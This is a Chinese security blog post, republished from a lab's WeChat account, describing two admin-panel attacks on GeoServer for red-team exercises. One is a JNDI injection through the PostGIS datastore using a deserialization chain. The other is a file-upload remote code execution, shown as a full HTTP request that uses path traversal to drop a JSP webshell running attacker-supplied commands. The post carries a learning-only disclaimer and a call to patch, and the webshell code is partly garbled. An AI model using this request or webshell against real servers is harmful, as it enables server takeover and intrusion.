相信各位师傅在HVV中,都遇到过geoserver系统,但是一般都是弱口令或者信息泄露、SSRF之类的,拿shell的案例不多,下面分享下geoserver系统后台的两种打法。
一、后台JNDI 注⼊
测试版本:Version 2.13.3
数据储存—》添加新的数据存储—》PostGIS (JNDI) —》jndiReferenceName *
使用CB1链,弹个计算器
二、GeoServer后台文件上传致远程代码执行漏洞
测试版本:Version 2.22.2
修改相对路径为绝对路径,即可愉快的上传webshell了。
我了个去,不解析jsp
换war包用tomcat部署
POST /geoserver/rest/workspaces/nurc/coveragestores/mosaic/file.shp?filename=../../../../shell/1.jsp HTTP/1.1 Host: localhost:8080 Content-Length: 370 sec-ch-ua: "Not_A Brand";v="8", "Chromium";v="120" sec-ch-ua-mobile: ?0 Wicket-FocusedElementId: id39 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.199 Safari/537.36 Content-Type: multipart/form-data; boundary-----WebKitFormBoundaryfoycybhDiQZEqxoy Accept: application/xml, text/xml, */*; q=0.01 Wicket-Ajax-BaseURL: wicket/bookmarkable/org.geoserver.web.data.store.CoverageStoreEditPage?7&storeName=mosaic&wsName=nurc X-Requested-With: XMLHttpRequest Wicket-Ajax: true sec-ch-ua-platform: "Windows" Origin: http://localhost:8080 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: http://localhost:8080/geoserver/web/wicket/bookmarkable/org.geoserver.web.data.store.CoverageStoreEditPage?7&storeName=mosaic&wsName=nurc Accept-Encoding: gzip, deflate, br Accept-Language: zh-CN,zh;q=0.9 Cookie:JSESSIONID=52159346772CE228794C0E097A442D9F Connection: close <% if(request.getParameter("cmd") != null) { java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream(); int a = -1; byte[] b = new byte[2048]; out.print(" "); "); } %> |
该漏洞虽然已公布部分 poc但仍处于 1day状态,请勿用于违法用途,仅做测试环境交流学习。由于该系统弱口令使用情况较为广泛,建议受影响的用户尽快修复漏洞。
-=[感·谢·阅·读]=-
关于我们
星网实验室成立(starnetlabs)于2021年10月,是智网安云(武汉)信息技术有限公司旗下安全研究院实验室之一,其成员主要来源于国内一线安全厂商或监管执法机构,多名成员取得CISSP,CISP,PMP,CISAW,PTE等国内网络安全圈行业认证证书,该实验室研究员多次参加国内和省内网络安全攻防比赛取得佳绩。实验室主要研究方向:网络安全攻防竞赛、最前沿的攻防技术,云计算安全、物联网安全等。形成一支结构合理、创新能力强的产学研队伍。星网实验室将持续沉淀前沿安全能力,面向产业输出业蓝军网络安全对抗工具、红队攻击武器平台、蜜网平台、大数据安全管理中心等产品,并持续开放各项核心能力,推动产业安全能力建设。护航各行业数字化变革,守护大数据时代的网络安全是星网实验室的使命。
大
佬
,
关
注
一
下
呗
!
原文始发于微信公众号(星网实验室):geoserver漏洞解析以及测试方法
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论